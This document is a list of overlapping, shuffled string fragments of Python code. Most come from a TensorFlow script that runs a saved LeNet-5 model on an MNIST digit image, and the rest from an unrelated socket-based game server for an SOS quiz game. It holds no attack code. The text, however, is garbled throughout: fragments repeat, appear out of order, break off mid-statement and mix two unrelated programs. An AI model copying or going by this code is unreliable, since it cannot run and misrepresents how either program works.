"result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as g:",
"784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) #",
"= tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE,",
"#x = tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as g: x",
"Created on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL import",
"# [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None,",
"tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32,",
"784]) #x = result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE,",
"Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in",
"tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1,",
"mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver =",
"import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def",
"tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image =",
"tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva",
"# mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess) print('recognize result:')",
"#ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x",
"init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1,",
"tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None)",
"tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver =",
"result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x =",
"= [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva result=imageprepare() #x =",
"tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_",
"with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32,",
"= np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score =",
"= mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, #",
"mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as",
"correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image =",
"import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png')",
"= list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva",
"= Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x",
"sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS))",
"x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt =",
"np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result with",
"1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image",
"y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() #",
"# ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) #",
"tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return",
"# mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) #",
"ImageFilter import tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward",
"tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as",
"mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ =",
"[None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE,",
"np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva",
"= mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver",
"with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path)",
"Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL import Image, ImageFilter import",
"accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv",
"im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for",
"= tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None)",
"tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt",
"21:27:18 2019 @author: biyef \"\"\" from PIL import Image, ImageFilter import tensorflow as",
"tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy",
"#return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result",
"saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy",
"return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default()",
"tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction,",
"mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess) print('recognize result:') print(predint[0])",
"ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) #",
"= tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction",
"mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, #",
"= tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ =",
"mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # #",
"#eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess:",
"ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))",
"PIL import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as plt import",
"as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784])",
"[None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None)",
"x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_",
"tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y =",
"# accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32)",
"tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x =",
"for x in tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None,",
"mnist_lenet5_forward import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata()))",
"image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1)",
"#prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer()",
"mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, #",
"def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva =",
"# mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x:",
"on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL import Image,",
"= tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy =",
"mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore =",
"7 21:27:18 2019 @author: biyef \"\"\" from PIL import Image, ImageFilter import tensorflow",
"y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with",
"tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs",
"imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[",
"#x = result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS])",
"plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv]",
"as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare(): im",
"tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], #",
"mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im)",
"# ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y,",
"# image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction =",
"saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt =",
"from PIL import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as plt",
"list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva result=imageprepare()",
"# y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema",
"= tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare()",
"import tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import",
"#image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva =",
"utf-8 -*- \"\"\" Created on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\"",
"# saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) #",
"= tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt],",
"# mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #",
"# # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore)",
"reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score",
"# correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image",
"matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare():",
"y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema =",
"x in tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784])",
"[None, 784]) #x = result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE,",
"reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt],",
"#print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im)",
"mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess) print('recognize",
"sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],(",
"np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE,",
"as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as",
"[ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE])",
"\"\"\" from PIL import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as",
"# # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))",
"= tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH)",
"ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( #",
"= np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], #",
"import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv",
"import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward",
"-*- coding: utf-8 -*- \"\"\" Created on Thu Nov 7 21:27:18 2019 @author:",
"ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1),",
"\"\"\" Created on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL",
"tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None,",
"tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') #"
] |
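The only real preprocessing in the script above is the comprehension inside imageprepare(): each grayscale pixel x in [0, 255] is inverted and rescaled to [0, 1], presumably to match the white-on-black MNIST inputs the LeNet-5 checkpoint was trained on. The transform in isolation, with no TF or PIL required:

# Invert-and-normalize, as in imageprepare(): 0 (black) -> 1.0, 255 (white) -> 0.0.
tv = [0, 128, 255]                       # sample grayscale pixel values
tva = [(255 - x) * 1.0 / 255.0 for x in tv]
print(tva)                               # [1.0, 0.498..., 0.0]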
[
"move(self, id, move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn != id:",
"conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in enumerate(self.active_connections): if",
"\", ping1 * 1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times =",
"with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []]",
"{duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return",
"random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1) + operator + str(number_2)",
"GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else:",
"the Question: \" + question + \" / UUID: \" + self.game.question_uuid) def",
"self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True if ready_to_start: self.generate_question() self.notify_players()",
"self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)], [{} for",
"between timestamps of player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference =",
"class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self):",
"[0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players()",
"self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id]",
"if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0],",
"= 0.010 # in seconds def __init__(self): self.active_connections = [None, None] self.game =",
"range(coordinate_y - 1, coordinate_y + 2): for direction in directions: sequence = \"\"",
"if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE:",
"def close_connections(self): for conn in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x,",
"x in range(coordinate_x - 1, coordinate_x + 2): for y in range(coordinate_y -",
"in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions =",
"\"*\"] operator = random.choice(operator_list) limit = 20 if operator == \"*\" else 100",
"self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self):",
"coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self,",
"print(\"Sending Game information to the all players\") def connection_thread(self, conn, id): if self.game.state",
"else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if",
"= answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts",
"client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start =",
"conn): id = 1 if self.active_connections[0] == None: id = 0 self.active_connections[id] =",
"ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0",
"False self.answer_ts = [None, None] print(\"Generated the Question: \" + question + \"",
"/ 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping:",
"= [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in",
"\" ms\") print(\"Player 1 has a ping: \", ping1 * 1000, \" ms\")",
"= [None, None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None,",
"sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for",
"self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn =",
"= sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0",
"limit = 20 if operator == \"*\" else 100 number_1 = random.randint(1, limit)",
"self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True",
"0], [-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for",
"None] print(\"Generated the Question: \" + question + \" / UUID: \" +",
"= id self.notify_players() # Returns the normalized timestamp difference between acknowledgment of two",
"self.game.players_names[1 - id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start()",
"c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in",
"c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference",
"self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] +=",
"send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id }",
"time sys.path.append('..') from game import Game, GameState from utils import string_to_byte, byte_to_string class",
"print(\"Player 0 has a ping: \", ping0 * 1000, \" ms\") print(\"Player 1",
"the question \" + uuid) self.both_players_received = True return else: return else: return",
"\"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10):",
"from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010",
"= move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration):",
"self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] != None: ready =",
"notify_players(self): print(\"Sending Game information to the all players\") def connection_thread(self, conn, id): if",
"conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list =",
"- (i - 1) * direction[0], y - (i - 1) * direction[1]])",
"self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) /",
"= time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state !=",
"import threading import pickle import json import sys import random import uuid import",
